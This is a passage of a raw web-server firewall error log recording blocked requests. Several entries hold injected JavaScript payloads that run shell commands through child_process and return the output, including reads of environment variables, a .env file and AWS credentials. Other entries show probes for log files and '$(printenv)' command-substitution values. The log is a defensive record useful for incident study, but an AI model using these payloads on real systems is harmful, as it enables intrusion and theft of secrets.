{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUNHHGKW6pmaAbFK8bertgAAAQU"] [Thu Dec 18 18:50:45.568471 2025] [:error] [pid 20930:tid 20942] [client 134.209.251.226:53990] [client 134.209.251.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUQw5RwkqfWPPVWn5O_-7gAAAEg"] [Sat Dec 20 21:04:01.273364 2025] [autoindex:error] [pid 2979:tid 3017] [client 194.233.94.240:34176] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/product/sliders/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 20 21:04:14.393121 2025] [:error] [pid 14867:tid 14881] [client 194.233.94.240:57076] [client 194.233.94.240] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aUbzLhEa7-gEcvxb--z_cAAAAMw"] [Thu Dec 25 08:33:20.054778 2025] [:error] [pid 15884:tid 15982] [client 202.155.143.190:57961] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzasM3VF9Bh8E2WfHod5QAAAEs"] [Thu Dec 25 08:33:21.261526 2025] [:error] [pid 16113:tid 16115] [client 202.155.143.190:57976] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzasSpu7iJrB_isq4w34gAAAMA"] [Thu Dec 25 08:33:22.154619 2025] [:error] [pid 15884:tid 15972] [client 202.155.143.190:57998] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzass3VF9Bh8E2WfHod5gAAAEY"] [Thu Dec 25 08:33:22.922136 2025] [:error] [pid 15884:tid 15966] [client 202.155.143.190:58008] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzass3VF9Bh8E2WfHod5wAAAEE"] [Thu Dec 25 08:35:18.361143 2025] [:error] [pid 15883:tid 15929] [client 202.155.143.190:59867] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzbJuwedd9knRUhIQdWYwAAAAA"] [Thu Dec 25 08:35:30.410515 2025] [:error] [pid 15885:tid 16000] [client 202.155.143.190:60096] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzbMrVtXXjkPSTpVh8U8QAAAI8"] [Thu Dec 25 08:35:30.631300 2025] [:error] [pid 15885:tid 15977] [client 202.155.143.190:60100] [client 202.155.143.190] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "17"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aUzbMrVtXXjkPSTpVh8U8wAAAII"] [Fri Dec 26 11:32:07.627435 2025] [:error] [pid 30979:tid 31192] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$4:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$BF0Dg\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('ls -a').toString().trim();var encoded=Buffer.from(res).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${encoded};307;`});\\x22,\\x22_chunks\\x22:\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU5WF6zTueqzR1_91wogpQAAAQk"] [Fri Dec 26 11:32:07.914002 2025] [:error] [pid 30979:tid 31191] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$4:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$BxxZw\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('printenv').toString().trim();var encoded=Buffer.from(res).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${encoded};307;`});\\x22,\\x22_chunks\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU5WF6zTueqzR1_91wogpgAAAQg"] [Fri Dec 26 11:32:08.214272 2025] [:error] [pid 30979:tid 31179] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$4:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$BXuet\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('cat .env').toString().trim();var encoded=Buffer.from(res).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${encoded};307;`});\\x22,\\x22_chunks\\x22:\\..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU5WGKzTueqzR1_91wogpwAAAQI"] [Fri Dec 26 11:32:08.500473 2025] [:error] [pid 30979:tid 31203] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$5:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1AeF\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('cat ~/.aws/credentials').toString().trim();var encoded=Buffer.from(res).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${encoded};307;`});\\x22,\\x2..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU5WGKzTueqzR1_91wogqQAAARI"] [Fri Dec 26 11:32:08.787151 2025] [:error] [pid 30979:tid 31194] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$2:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$BZzde\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('id').toString().trim();var encoded=Buffer.from(res).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${encoded};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU5WGKzTueqzR1_91wogqgAAAQs"] [Fri Dec 26 11:32:13.202104 2025] [:error] [pid 30979:tid 31189] [client 160.250.70.23:37358] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:data. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv) found within ARGS:data: {\\x22cmd\\x22:\\x22printenv\\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv)\\x22}"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/api/cache"] [unique_id "aU5WHazTueqzR1_91woguAAAAQY"] [Fri Dec 26 11:32:18.985357 2025] [:error] [pid 7440:tid 7511] [client 160.250.70.23:56494] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:payload. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv) found within ARGS:payload: {\\x22cmd\\x22:\\x22printenv\\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv)\\x22}"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/api/decode"] [unique_id "aU5WIidHWU5cYDV_u1bmbQAAAFU"] [Fri Dec 26 11:32:24.922234 2025] [:error] [pid 7441:tid 7502] [client 160.250.70.23:35274] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:cookie. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv) found within ARGS:cookie: {\\x22cmd\\x22:\\x22printenv\\x22,\\x22token\\x22:\\x221337\\x22,\\x22data\\x22:\\x22$(printenv)\\x22}"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/api/session"] [unique_id "aU5WKAuvl-1xXEnQvOo3xwAAAI0"] [Fri Dec 26 11:32:31.003382 2025] [:error] [pid 7441:tid 7505] [client 160.250.70.23:43686] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aU5WLwuvl-1xXEnQvOo3zAAAAI8"] [Fri Dec 26 11:32:31.284256 2025] [:error] [pid 7441:tid 7507] [client 160.250.70.23:43686] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/nginx/error.log"] [unique_id "aU5WLwuvl-1xXEnQvOo3zQAAAJA"] [Fri Dec 26 11:32:31.564863 2025] [:error] [pid 7441:tid 7500] [client 160.250.70.23:43686] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aU5WLwuvl-1xXEnQvOo3zgAAAIw"] [Fri Dec 26 11:32:31.847757 2025] [:error] [pid 7441:tid 7495] [client 160.250.70.23:43686] [client 160.250.70.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/application.log"] [unique_id "aU5WLwuvl-1xXEnQvOo3zwAAAIk"] [Fri Dec 26 14:59:04.547624 2025] [:error] [pid 7574:tid 7578] [client 4.217.183.253:5392] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Dec 27 07:36:12.132630 2025] [:error] [pid 6397:tid 6472] [client 13.214.210.12:34704] [client 13.214.210.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/action"] [unique_id "aU9wTLVQSsbzOWeYNjEpRwAAANE"] [Sat Dec 27 15:11:28.579530 2025] [:error] [pid 24834:tid 24845] [client 143.110.176.171:52231] [client 143.110.176.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`} )..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aU_bAIoYdyfS1UeU1MdSrgAAAoA"] [Sat Dec 27 15:11:29.353178 2025] [:error] [pid 6397:tid 6475] [client 143.110.176.171:26904] [client 143.110.176.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection 